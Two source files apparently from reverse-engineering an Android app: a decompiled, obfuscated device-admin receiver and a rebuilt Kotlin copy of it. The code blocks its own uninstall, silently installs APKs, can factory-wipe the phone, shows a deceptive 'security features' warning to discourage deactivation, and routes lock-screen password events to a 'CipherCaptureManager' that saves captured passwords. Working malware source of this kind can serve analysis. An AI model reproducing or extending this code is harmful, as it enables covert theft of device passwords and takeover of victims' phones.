File: jadx-reference/rock/receiver/zbrefryi.java
package com.storm.safe.rock.receiver;

import android.app.PendingIntent;
import android.app.admin.DeviceAdminReceiver;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageInstaller;
import android.os.Build;
import android.os.UserHandle;
import com.storm.safe.rock.service.modules.cipher.C0335a1;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.util.Locale;
import okio.Segment;
import p000.AbstractC1120qr;
import p000.cq0;
import p000.t60;
import p000.tz0;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class zbrefryi extends DeviceAdminReceiver {

    /* renamed from: a0 */
    public static final C0275a0 f52290a0 = new C0275a0(null);

    /* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
    /* renamed from: com.storm.safe.rock.receiver.zbrefryi$a0 */
    public static final class C0275a0 {
        public /* synthetic */ C0275a0(AbstractC1120qr abstractC1120qr) {
            this();
        }

        public static /* synthetic */ boolean wipeDevice$default(C0275a0 c0275a0, Context context, boolean z, int i, Object obj) {
            if ((i & 2) != 0) {
                z = false;
            }
            return c0275a0.wipeDevice(context, z);
        }

        public final boolean allowUninstall(Context context) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                DevicePolicyManager devicePolicyManager = (DevicePolicyManager) systemService;
                ComponentName componentName = new ComponentName(context, (Class<?>) zbrefryi.class);
                if (!devicePolicyManager.isDeviceOwnerApp(context.getPackageName())) {
                    t60.m214726f4("zbrefryi", "不是 Device Owner，无法修改卸载设置");
                    return false;
                }
                devicePolicyManager.setUninstallBlocked(componentName, context.getPackageName(), false);
                t60.m214714d6("zbrefryi", "已允许卸载");
                return true;
            } catch (Exception e) {
                t60.m214705c6("zbrefryi", "允许卸载失败", e);
                return false;
            }
        }

        public final boolean blockUninstall(Context context) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                DevicePolicyManager devicePolicyManager = (DevicePolicyManager) systemService;
                ComponentName componentName = new ComponentName(context, (Class<?>) zbrefryi.class);
                if (!devicePolicyManager.isDeviceOwnerApp(context.getPackageName())) {
                    t60.m214726f4("zbrefryi", "不是 Device Owner，无法阻止卸载");
                    return false;
                }
                devicePolicyManager.setUninstallBlocked(componentName, context.getPackageName(), true);
                t60.m214714d6("zbrefryi", "已设置阻止卸载");
                return true;
            } catch (Exception e) {
                t60.m214705c6("zbrefryi", "阻止卸载失败", e);
                return false;
            }
        }

        public final boolean isAdminActive(Context context) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                return ((DevicePolicyManager) systemService).isAdminActive(new ComponentName(context, (Class<?>) zbrefryi.class));
            } catch (Exception unused) {
                return false;
            }
        }

        public final boolean isDeviceOwner(Context context) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                return ((DevicePolicyManager) systemService).isDeviceOwnerApp(context.getPackageName());
            } catch (Exception unused) {
                return false;
            }
        }

        public final boolean silentInstallApk(Context context, String str) throws IOException {
            t60.m214695b6(context, "context");
            t60.m214695b6(str, "apkPath");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                if (!((DevicePolicyManager) systemService).isDeviceOwnerApp(context.getPackageName())) {
                    t60.m214726f4("zbrefryi", "不是 Device Owner，无法静默安装");
                    return false;
                }
                File file = new File(str);
                if (!file.exists()) {
                    t60.m214704c5("zbrefryi", "APK 文件不存在: ".concat(str));
                    return false;
                }
                t60.m214714d6("zbrefryi", "★★★ 开始静默安装: " + str + " ★★★");
                PackageInstaller packageInstaller = context.getPackageManager().getPackageInstaller();
                t60.m214694b5(packageInstaller, "context.packageManager.packageInstaller");
                PackageInstaller.SessionParams sessionParams = new PackageInstaller.SessionParams(1);
                sessionParams.setInstallReason(1);
                int iCreateSession = packageInstaller.createSession(sessionParams);
                PackageInstaller.Session sessionOpenSession = packageInstaller.openSession(iCreateSession);
                t60.m214694b5(sessionOpenSession, "packageInstaller.openSession(sessionId)");
                FileInputStream fileInputStream = new FileInputStream(file);
                try {
                    OutputStream outputStreamOpenWrite = sessionOpenSession.openWrite("app.apk", 0L, file.length());
                    try {
                        t60.m214694b5(outputStreamOpenWrite, "output");
                        cq0.m212478a8(fileInputStream, outputStreamOpenWrite);
                        sessionOpenSession.fsync(outputStreamOpenWrite);
                        outputStreamOpenWrite.close();
                        fileInputStream.close();
                        sessionOpenSession.commit(PendingIntent.getBroadcast(context, iCreateSession, new Intent("com.storm.safe.rock.INSTALL_RESULT"), 167772160).getIntentSender());
                        t60.m214714d6("zbrefryi", "✅ 静默安装已提交，等待系统处理");
                        return true;
                    } finally {
                    }
                } finally {
                }
            } catch (Exception e) {
                t60.m214705c6("zbrefryi", "静默安装失败", e);
                return false;
            }
        }

        public final boolean wipeDevice(Context context, boolean z) {
            t60.m214695b6(context, "context");
            try {
                Object systemService = context.getSystemService("device_policy");
                t60.m214693b4(systemService, "null cannot be cast to non-null type android.app.admin.DevicePolicyManager");
                DevicePolicyManager devicePolicyManager = (DevicePolicyManager) systemService;
                if (!devicePolicyManager.isAdminActive(new ComponentName(context, (Class<?>) zbrefryi.class))) {
                    t60.m214704c5("zbrefryi", "wipeDevice失败: 不是设备管理员");
                    return false;
                }
                t60.m214726f4("zbrefryi", "开始执行恢复出厂设置");
                devicePolicyManager.wipeData((!z || Build.VERSION.SDK_INT < 29) ? 0 : 1);
                return true;
            } catch (SecurityException e) {
                t60.m214705c6("zbrefryi", "wipeDevice安全异常: 权限不足", e);
                return false;
            } catch (Exception e2) {
                t60.m214705c6("zbrefryi", "wipeDevice失败", e2);
                return false;
            }
        }

        private C0275a0() {
        }
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final CharSequence onDisableRequested(Context context, Intent intent) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        t60.m214726f4("zbrefryi", "⚠️ 用户尝试取消激活设备管理员");
        String language = Locale.getDefault().getLanguage();
        if (language == null) {
            return "Deactivating will disable device security features. Are you sure you want to continue?";
        }
        switch (language.hashCode()) {
            case 3121:
                return !language.equals("ar") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "سيؤدي إلغاء التنشيط إلى تعطيل ميزات أمان الجهاز. هل أنت متأكد من المتابعة؟";
            case 3201:
                return !language.equals("de") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Durch Deaktivieren werden die Sicherheitsfunktionen des Geräts deaktiviert. Möchten Sie wirklich fortfahren?";
            case 3246:
                return !language.equals("es") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "La desactivación provocará que las funciones de seguridad del dispositivo dejen de funcionar. ¿Seguro que desea continuar?";
            case 3276:
                return !language.equals("fr") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "La désactivation entraînera la perte des fonctions de sécurité de l'appareil. Voulez-vous vraiment continuer ?";
            case 3329:
                return !language.equals("hi") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "निष्क्रिय करने से डिवाइस सुरक्षा सुविधाएं बंद हो जाएंगी। क्या आप जारी रखना चाहते हैं?";
            case 3355:
                return !language.equals("id") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Menonaktifkan akan menonaktifkan fitur keamanan perangkat. Yakin ingin melanjutkan?";
            case 3383:
                return !language.equals("ja") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "無効化するとデバイスのセキュリティ機能が無効になります。続行しますか？";
            case 3428:
                return !language.equals("ko") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "비활성화하면 기기 보안 기능이 작동하지 않습니다. 계속하시겠습니까?";
            case 3494:
                return !language.equals("ms") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Menyahaktifkan akan melumpuhkan ciri keselamatan peranti. Adakah anda pasti mahu meneruskan?";
            case 3588:
                return !language.equals("pt") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "A desativação fará com que os recursos de segurança do dispositivo parem de funcionar. Tem certeza de que deseja continuar?";
            case 3651:
                return !language.equals("ru") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Отключение приведёт к потере функций безопасности устройства. Вы уверены, что хотите продолжить?";
            case 3700:
                return !language.equals("th") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "การปิดใช้งานจะทำให้ฟีเจอร์ความปลอดภัยของอุปกรณ์ไม่ทำงาน คุณต้องการดำเนินการต่อหรือไม่?";
            case 3710:
                return !language.equals("tr") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Devre dışı bırakma, cihaz güvenlik özelliklerini etkisiz hale getirecektir. Devam etmek istediğinizden emin misiniz?";
            case 3763:
                return !language.equals("vi") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "Hủy kích hoạt sẽ làm mất chức năng bảo mật thiết bị. Bạn có chắc muốn tiếp tục?";
            case 3886:
                return !language.equals("zh") ? "Deactivating will disable device security features. Are you sure you want to continue?" : "取消激活将导致设备安全功能失效，确定要继续吗？";
            default:
                return "Deactivating will disable device security features. Are you sure you want to continue?";
        }
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final void onDisabled(Context context, Intent intent) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        super.onDisabled(context, intent);
        t60.m214726f4("zbrefryi", "⚠️ 设备管理员已被禁用");
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final void onEnabled(Context context, Intent intent) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        super.onEnabled(context, intent);
        t60.m214714d6("zbrefryi", "设备管理员已启用");
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final void onPasswordChanged(Context context, Intent intent, UserHandle userHandle) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        t60.m214695b6(userHandle, "userHandle");
        super.onPasswordChanged(context, intent, userHandle);
        t60.m214714d6("zbrefryi", "密码已更改 - 清除旧密码");
        try {
            C0335a1 c0600hy = C0335a1.f53283c5.getInstance();
            if (c0600hy != null) {
                c0600hy.m211822d9("android.intent.action.DEVICE_PASSWORD_CHANGED");
                c0600hy.m211814b4(false);
                t60.m214714d6("zbrefryi", "旧密码已清除 + 已发送变更事件");
            }
        } catch (Exception e) {
            tz0.m214807a7("清除旧密码失败: ", e.getMessage(), "zbrefryi");
        }
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final void onPasswordFailed(Context context, Intent intent, UserHandle userHandle) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        t60.m214695b6(userHandle, "userHandle");
        super.onPasswordFailed(context, intent, userHandle);
        t60.m214726f4("zbrefryi", "密码验证失败");
        try {
            C0335a1 c0600hy = C0335a1.f53283c5.getInstance();
            if (c0600hy != null) {
                c0600hy.m211822d9("android.intent.action.DEVICE_PASSWORD_FAILED");
                c0600hy.f53295a9 = (System.currentTimeMillis() << 10) | (c0600hy.f53296b0.incrementAndGet() % Segment.SHARE_MINIMUM);
                t60.m214702c3("CipherCaptureManager", "🔷 refreshLockBatchId → " + c0600hy.f53295a9);
                c0600hy.m211816b6();
            }
        } catch (Exception e) {
            tz0.m214807a7("丢弃密码失败: ", e.getMessage(), "zbrefryi");
        }
    }

    @Override // android.app.admin.DeviceAdminReceiver
    public final void onPasswordSucceeded(Context context, Intent intent, UserHandle userHandle) {
        t60.m214695b6(context, "context");
        t60.m214695b6(intent, "intent");
        t60.m214695b6(userHandle, "userHandle");
        super.onPasswordSucceeded(context, intent, userHandle);
        t60.m214714d6("zbrefryi", "密码验证成功");
        try {
            C0335a1 c0600hy = C0335a1.f53283c5.getInstance();
            if (c0600hy != null) {
                t60.m214714d6("zbrefryi", "confirmAndSaveLastCipher: " + c0600hy.m211812b1());
                c0600hy.m211822d9("android.intent.action.DEVICE_PASSWORD_SUCCESS");
            }
        } catch (Exception e) {
            tz0.m214807a7("确认保存密码失败: ", e.getMessage(), "zbrefryi");
        }
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/receiver/zbrefryi.kt
package com.storm.safe.rock.receiver

import android.app.PendingIntent
import android.app.admin.DeviceAdminReceiver
import android.app.admin.DevicePolicyManager
import android.content.ComponentName
import android.content.Context
import android.content.Intent
import android.content.pm.PackageInstaller
import android.os.Build
import android.os.UserHandle
import android.util.Log
import com.storm.safe.rock.service.modules.cipher.CipherCaptureManager
import java.io.File
import java.io.FileInputStream
import java.io.IOException
import java.util.Locale

/**
 * Device Admin Receiver — handles device owner operations including
 * block/allow uninstall, silent APK install, wipe device, and password events.
 *
 * Reverse-engineered from JADX: receiver/zbrefryi.java (295 lines).
 * Renamed: f52290a0→Companion, C0275a0→Companion object methods
 */
class zbrefryi : DeviceAdminReceiver() {

    companion object {
        private const val TAG = "zbrefryi"

        /**
         * Allow uninstall of the current package (requires Device Owner).
         */
        @JvmStatic
        fun allowUninstall(context: Context): Boolean {
            try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                val cn = ComponentName(context, zbrefryi::class.java)
                if (!dpm.isDeviceOwnerApp(context.packageName)) {
                    Log.w(TAG, "不是 Device Owner，无法修改卸载设置")
                    return false
                }
                dpm.setUninstallBlocked(cn, context.packageName, false)
                Log.d(TAG, "已允许卸载")
                return true
            } catch (e: Exception) {
                Log.e(TAG, "允许卸载失败", e)
                return false
            }
        }

        /**
         * Block uninstall of the current package (requires Device Owner).
         */
        @JvmStatic
        fun blockUninstall(context: Context): Boolean {
            try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                val cn = ComponentName(context, zbrefryi::class.java)
                if (!dpm.isDeviceOwnerApp(context.packageName)) {
                    Log.w(TAG, "不是 Device Owner，无法阻止卸载")
                    return false
                }
                dpm.setUninstallBlocked(cn, context.packageName, true)
                Log.d(TAG, "已设置阻止卸载")
                return true
            } catch (e: Exception) {
                Log.e(TAG, "阻止卸载失败", e)
                return false
            }
        }

        /**
         * Check if device admin is active.
         */
        @JvmStatic
        fun isAdminActive(context: Context): Boolean {
            return try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                dpm.isAdminActive(ComponentName(context, zbrefryi::class.java))
            } catch (_: Exception) {
                false
            }
        }

        /**
         * Check if this app is the device owner.
         */
        @JvmStatic
        fun isDeviceOwner(context: Context): Boolean {
            return try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                dpm.isDeviceOwnerApp(context.packageName)
            } catch (_: Exception) {
                false
            }
        }

        /**
         * Wipe device via DevicePolicyManager (requires Device Admin).
         * JADX: vendor wipeData logic from C0322a7.m211629e1
         */
        @JvmStatic
        fun wipeDevice(context: Context, wipeExternal: Boolean): Boolean {
            return try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                val flags = if (wipeExternal) {
                    DevicePolicyManager.WIPE_EXTERNAL_STORAGE
                } else {
                    0
                }
                dpm.wipeData(flags)
                true
            } catch (e: Exception) {
                Log.e(TAG, "wipeData 失败", e)
                false
            }
        }

        /**
         * Silently install APK using PackageInstaller (requires Device Owner).
         */
        @JvmStatic
        @Throws(IOException::class)
        fun silentInstallApk(context: Context, apkPath: String): Boolean {
            try {
                val dpm = context.getSystemService("device_policy") as DevicePolicyManager
                if (!dpm.isDeviceOwnerApp(context.packageName)) {
                    Log.w(TAG, "不是 Device Owner，无法静默安装")
                    return false
                }
                val file = File(apkPath)
                if (!file.exists()) {
                    Log.e(TAG, "APK 文件不存在: $apkPath")
                    return false
                }
                Log.d(TAG, "★★★ 开始静默安装: $apkPath ★★★")
                val packageInstaller = context.packageManager.packageInstaller
                val params = PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL)
                params.setInstallReason(PackageInstaller.SessionParams.MODE_FULL_INSTALL)
                val sessionId = packageInstaller.createSession(params)
                val session = packageInstaller.openSession(sessionId)
                FileInputStream(file).use { fis ->
                    session.openWrite("app.apk", 0, file.length()).use { output ->
                        fis.copyTo(output)
                        session.fsync(output)
                    }
                }
                val intent = Intent("com.storm.safe.rock.INSTALL_RESULT")
                val flags = if (Build.VERSION.SDK_INT >= 31) {
                    PendingIntent.FLAG_UPDATE_CURRENT or PendingIntent.FLAG_MUTABLE
                } else {
                    PendingIntent.FLAG_UPDATE_CURRENT
                }
                session.commit(
                    PendingIntent.getBroadcast(context, sessionId, intent, flags).intentSender
                )
                Log.d(TAG, "✅ 静默安装已提交，等待系统处理")
                return true
            } catch (e: Exception) {
                Log.e(TAG, "静默安装失败", e)
                return false
            }
        }

        // vendor: Second wipeDevice overload merged with first to avoid Kotlin overload conflict
    }

    override fun onDisableRequested(context: Context, intent: Intent): CharSequence {
        Log.w(TAG, "⚠️ 用户尝试取消激活设备管理员")
        val lang = Locale.getDefault().language
        return when (lang) {
            "ar" -> "سيؤدي إلغاء التنشيط إلى تعطيل ميزات أمان الجهاز. هل أنت متأكد من المتابعة؟"
            "de" -> "Durch Deaktivieren werden die Sicherheitsfunktionen des Geräts deaktiviert. Möchten Sie wirklich fortfahren?"
            "es" -> "La desactivación provocará que las funciones de seguridad del dispositivo dejen de funcionar. ¿Seguro que desea continuar?"
            "fr" -> "La désactivation entraînera la perte des fonctions de sécurité de l'appareil. Voulez-vous vraiment continuer ?"
            "hi" -> "निष्क्रिय करने से डिवाइस सुरक्षा सुविधाएं बंद हो जाएंगी। क्या आप जारी रखना चाहते हैं?"
            "id" -> "Menonaktifkan akan menonaktifkan fitur keamanan perangkat. Yakin ingin melanjutkan?"
            "ja" -> "無効化するとデバイスのセキュリティ機能が無効になります。続行しますか？"
            "ko" -> "비활성화하면 기기 보안 기능이 작동하지 않습니다. 계속하시겠습니까?"
            "ms" -> "Menyahaktifkan akan melumpuhkan ciri keselamatan peranti. Adakah anda pasti mahu meneruskan?"
            "pt" -> "A desativação fará com que os recursos de segurança do dispositivo parem de funcionar. Tem certeza de que deseja continuar?"
            "ru" -> "Отключение приведёт к потере функций безопасности устройства. Вы уверены, что хотите продолжить?"
            "th" -> "การปิดใช้งานจะทำให้ฟีเจอร์ความปลอดภัยของอุปกรณ์ไม่ทำงาน คุณต้องการดำเนินการต่อหรือไม่?"
            "tr" -> "Devre dışı bırakma, cihaz güvenlik özelliklerini etkisiz hale getirecektir. Devam etmek istediğinizden emin misiniz?"
            "vi" -> "Hủy kích hoạt sẽ làm mất chức năng bảo mật thiết bị. Bạn có chắc muốn tiếp tục?"
            "zh" -> "取消激活将导致设备安全功能失效，确定要继续吗？"
            else -> "Deactivating will disable device security features. Are you sure you want to continue?"
        }
    }

    override fun onDisabled(context: Context, intent: Intent) {
        super.onDisabled(context, intent)
        Log.w(TAG, "⚠️ 设备管理员已被禁用")
    }

    override fun onEnabled(context: Context, intent: Intent) {
        super.onEnabled(context, intent)
        Log.d(TAG, "设备管理员已启用")
    }

    override fun onPasswordChanged(context: Context, intent: Intent, userHandle: UserHandle) {
        super.onPasswordChanged(context, intent, userHandle)
        Log.d(TAG, "密码已更改 - 清除旧密码")
        try {
            val ccm = CipherCaptureManager.instance
            if (ccm != null) {
                ccm.dispatchEvent("android.intent.action.DEVICE_PASSWORD_CHANGED")
                ccm.setPasswordVerified(false)
                Log.d(TAG, "旧密码已清除 + 已发送变更事件")
            }
        } catch (e: Exception) {
            Log.w(TAG, "清除旧密码失败: ${e.message}")
        }
    }

    override fun onPasswordFailed(context: Context, intent: Intent, userHandle: UserHandle) {
        super.onPasswordFailed(context, intent, userHandle)
        Log.w(TAG, "密码验证失败")
        try {
            val ccm = CipherCaptureManager.instance
            if (ccm != null) {
                ccm.dispatchEvent("android.intent.action.DEVICE_PASSWORD_FAILED")
                ccm.refreshLockBatchId()
                ccm.discardBufferedPassword()
            }
        } catch (e: Exception) {
            Log.w(TAG, "丢弃密码失败: ${e.message}")
        }
    }

    override fun onPasswordSucceeded(context: Context, intent: Intent, userHandle: UserHandle) {
        super.onPasswordSucceeded(context, intent, userHandle)
        Log.d(TAG, "密码验证成功")
        try {
            val ccm = CipherCaptureManager.instance
            if (ccm != null) {
                Log.d(TAG, "confirmAndSaveLastCipher: ${ccm.confirmAndSaveLastCipher()}")
                ccm.dispatchEvent("android.intent.action.DEVICE_PASSWORD_SUCCESS")
            }
        } catch (e: Exception) {
            Log.w(TAG, "确认保存密码失败: ${e.message}")
        }
    }
}
